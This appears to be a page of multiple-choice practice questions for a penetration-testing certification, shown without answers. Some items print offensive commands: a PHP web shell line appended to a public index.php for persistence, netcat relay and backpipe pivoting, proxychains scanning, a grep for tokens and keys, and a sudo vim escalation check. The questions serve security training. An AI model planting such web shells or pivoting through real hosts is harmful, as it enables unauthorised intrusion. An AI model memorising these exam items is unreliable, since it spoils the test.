Pre-Summer Sale Special - Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: sntaclus

A penetration tester attempts to obtain the preshared key for a client ' s wireless network. Which of the following actions will most likely aid the tester?

A.

Deploying an evil twin with a WiFi Pineapple

B.

Performing a password spraying attack with Hydra

C.

Setting up a captive portal using SET

D.

Deauthenticating clients using aireplay-ng

A penetration tester successfully clones a source code repository and then runs the following command:

find . -type f -exec egrep -i " token|key|login " {} \;

Which of the following is the penetration tester conducting?

A.

Data tokenization

B.

Secrets scanning

C.

Password spraying

D.

Source code analysis

A company hires a penetration tester to perform an external attack surface review as part of a security engagement. The company informs the tester that the main company domain to investigate is comptia.org. Which of the following should the tester do to accomplish the assessment objective?

A.

Perform information-gathering techniques to review internet-facing assets for the company.

B.

Perform a phishing assessment to try to gain access to more resources and users’ computers.

C.

Perform a physical security review to identify vulnerabilities that could affect the company.

D.

Perform a vulnerability assessment over the main domain address provided by the client.

Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?

A.

Articulation of cause

B.

Articulation of impact

C.

Articulation of escalation

D.

Articulation of alignment

A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester ' s machine. Which of the following commands should the tester use to do this task from the tester ' s host?

A.

attacker_host$ nmap -sT < target_cidr > | nc -n < compromised_host > 22

B.

attacker_host$ mknod backpipe p attacker_host$ nc -l -p 8000 | 0 < backpipe | nc < target_cidr > 80 | tee backpipe

C.

attacker_host$ nc -nlp 8000 | nc -n < target_cidr > attacker_host$ nmap -sT 127.0.0.1 8000

D.

attacker_host$ proxychains nmap -sT < target_cidr >

A penetration tester obtains a reverse shell on a server and executes the following command on the compromised server:

echo ' < ?php system($_GET[ " c " ]); ? > ' > > /var/www/public/index.php

Which of the following best explains what the penetration tester is trying to do?

A.

Prevent detection.

B.

Circumvent controls.

C.

Move laterally.

D.

Establish persistence.

A tester is working on an engagement that has evasion and stealth requirements. Which of the following enumeration methods is the least likely to be detected by the IDS?

A.

curl https://api.shodan.io/shodan/host/search?key= < API_KEY > & query=hostname: < target >

B.

proxychains nmap -sV -T2 < target >

C.

for i in < target > ; do curl -k $i; done

D.

nmap -sV -T2 < target >

A penetration tester receives the following output when enumerating a local user:

User compromised_user may run the following commands on localhost:

root (NO PASSWD): /bin/vim

The tester suspects that another host on the same subnet is also vulnerable. Which of the following is the best method to validate whether the other host is vulnerable?

A.

ssh compromised_user@victimhost " vim; echo $? "

B.

ssh compromised_user@victimhost " sudo -l "

C.

ssh compromised_user@victimhost " bash -c vim "

D.

ssh compromised_user@victimhost " ls -lah /bin/vim "

Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

A.

Badge cloning

B.

Shoulder surfing

C.

Tailgating

D.

Site survey

A penetration tester needs to quickly transfer an exploit from a Linux system to a Windows 10 system within the network. Which of the following is the best way to accomplish this task?

A.

nc -lvp 8080

B.

nc -lnvp 443

C.

python3 -m http.server 80

D.

ncat -lvp 9090